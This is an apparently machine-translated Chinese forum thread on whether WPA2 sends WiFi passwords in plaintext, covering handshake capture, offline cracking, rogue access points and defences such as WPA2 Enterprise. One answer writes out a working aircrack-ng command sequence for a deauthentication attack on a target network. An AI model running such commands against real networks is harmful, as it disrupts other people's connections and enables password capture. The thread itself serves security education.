昨天我去了我表弟的家,我看到我没有连接到他的无线(用于上网)。然后我查看了无线点列表。我找到了他的名字并点击了连接,我输入了他的密码(我知道)但它没有连接。然后我问他是否更改了密码,他告诉我他没有,因为只是无线设备关闭了。所以我想,我输入的密码会不会被隔壁的人“拿走了”?
我不知道是否将纯密码发送到设备。我认为你称之为接入点。
昨天我去了我表弟的家,我看到我没有连接到他的无线(用于上网)。然后我查看了无线点列表。我找到了他的名字并点击了连接,我输入了他的密码(我知道)但它没有连接。然后我问他是否更改了密码,他告诉我他没有,因为只是无线设备关闭了。所以我想,我输入的密码会不会被隔壁的人“拿走了”?
我不知道是否将纯密码发送到设备。我认为你称之为接入点。
是和不是。他们可能没有您的明文密码,但他们有足够的能力猜测并验证该猜测(即离线暴力破解)。
WPA2 身份验证通过四次握手执行。这种握手不仅仅将您的密码以明文形式发送到您连接的任何接入点,而是确保除非双方都已经知道密码,否则密码(或任何尝试使用密码)不会被泄露。但是,可以恢复足够多的四次握手,使离线密码破解成为可能。
请理解您每天都在冒这个风险。您的计算机/设备上的网络管理器可能配置为自动 1) 通过发送信标来搜索熟悉的接入点(从而宣传它熟悉的内容以及基本上如何模仿它),然后 2) 自动连接到任何熟悉的接入点回应。即使您当前连接到无线网络,攻击者也可以通过取消身份验证攻击断开您的连接,然后引诱您的设备连接到他们的蜜罐。
你能做些什么来保护自己?
如果您对 802.11(又名 WiFi)安全感兴趣,请查看 Vivek 在 SecurityTube 上的“WLAN-Security-Megaprimer”。有很多关于无线安全的 FUD 和误导性文章,但 Vivek Ramachandran 的材料和(当您准备尝试攻击自己时)aircrack-ng wiki上的文档是可靠的。我不能足够推荐 Vivek 的材料。此外,这篇关于WEP、WPA 和 WPA2安全性的文章似乎很有希望。
您在考虑安全性和提出正确问题方面做得很好。下一步是攻击自己。记住要保持偏执。
不,WPA2 密码不会以明文形式发送。如果是这种情况,任何人都可以从网络中删除您并直接从重新连接握手中嗅探密码。
另一方面,他们可以获取加密的握手并使用 aircrack-ng 对其进行破解。除了法拉第笼,你真的无法阻止这一点。
例如,有像 NAC 这样的缓解方法。如果他们没有公司(读取正确配置)计算机,这将阻止某人访问受信任的网段。
我在黑客工具方面有相当多的经验,从这里我可以告诉你以下内容(我是客人,所以我不能发表评论):
令人震惊的是,取消身份验证攻击真的很容易。它很简单:
airmon-ng start (insert your wifi device here (e.g. wlan0))
airodump-ng mon0
(Write down the channel)
iwconfig mon0 channel (insert channel here); iwconfig wlan0 channel (channel again)
aireplay-ng -a (insert target bssid here) --ignore-negative-one --deauth 0 mon0
甚至还有设置蜜罐 的脚本,所以要非常小心。
如何保护自己:
使用 WPA2 企业版。它需要设置一个 RADIUS 服务器。只要您拥有用于设置 RADIUS 的 CA 证书,当您使用 TLS 身份验证(基于证书)甚至 TTLS(隧道式普通身份验证)时,它就非常安全。这将阻止您连接到恶意 AP。